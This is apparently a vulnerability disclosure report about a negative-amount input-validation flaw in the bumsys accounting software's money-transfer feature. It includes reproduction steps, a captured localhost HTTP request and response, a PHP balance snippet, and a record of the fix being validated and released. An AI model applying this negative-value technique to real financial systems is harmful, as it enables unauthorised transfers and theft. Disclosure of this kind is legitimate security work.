Input validation and money transfer vulnerability with negative number in unilogies/bumsys


Reported on

Mar 28th 2023


I transfer money from account_1 to account_2. According to the scenario, account 1 will be deducted, and account 2 will add money. But account_1 was add, account was sub. If I use a negative number and its value exceeds the account balance, the money will still be added to the transfer account, minus the other account balance.

Proof of Concept

Step 1. Create two account and not tick on "Negative value is allowed"
Step 2. Create tranfer money from account_1 to account_2
Step 3. Fill Amount with value is a negative number (param: transferAmount)
Step 4. View account list and balance


POST /bumsys/xhr/?module=accounts&page=addNewTransfer HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 9c12e4b9e57bc9efb83a996e70ecb27d6416958b
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------233078791433030603453235893249
Content-Length: 713
Origin: http://localhost
Connection: close
Referer: http://localhost/bumsys/accounts/transfer-money/
Cookie: ea_session=j82te0avsr7l1ftll04hv52gla175nsp; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3; __e80d6ab52f32c63981a432872f0499f854e14685=1m2rjbbsnltbe4rjaue2d8pmig; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Content-Disposition: form-data; name="transferDate"

Content-Disposition: form-data; name="transferAcountsFrom"

Content-Disposition: form-data; name="transferAcountsTO"

Content-Disposition: form-data; name="transferAmount"

Content-Disposition: form-data; name="transferDescription"

Send money to account_2


HTTP/1.1 200 OK
Date: Tue, 28 Mar 2023 18:42:29 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
X-Powered-By: PHP/8.2.0
X-Frame-Options: DENY
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 69
Connection: close
Content-Type: text/html; charset=UTF-8

<div class='alert alert-success'>Transfer sucessfully completed</div>

Poc PDF Here

Image account list and balance


Take money from another account by money tranfer


   $accounts_balance = ( 
                            $gad["accounts_opening_balance"] + $gad["capital_amounts_sum"] + $gad["incomes_amount_sum"] + $gad["transfer_received_amount_sum"] + $gad["received_payments_amount_sum"] + $gad["payment_incoming_return_amount_sum"] + $gad["journal_incoming_payment_sum"]
                        ) - ( 
                            $gad["loan_amount_sum"] + $gad["payment_amount_sum"] + $gad["transfer_send_amount_sum"] + $gad["advance_payment_amount_sum"] + $gad["journal_outgoing_payment_sum"] + $gad["payment_outgoing_return_amount_sum"]
We are processing your report and will contact the unilogies/bumsys team within 24 hours. 2 months ago
TuanTH modified the report
2 months ago
TuanTH modified the report
2 months ago
TuanTH modified the report
2 months ago
TuanTH modified the report
2 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 2 months ago
Khurshid Alam validated this vulnerability 2 months ago
TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
2 months ago


Can you assign a CVE please?

Khurshid Alam marked this as fixed in 2.2.0 with commit e71c02 a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
ajax.php#L458-L517 has been validated
functions.php#L1879-L2004 has been validated
to join this conversation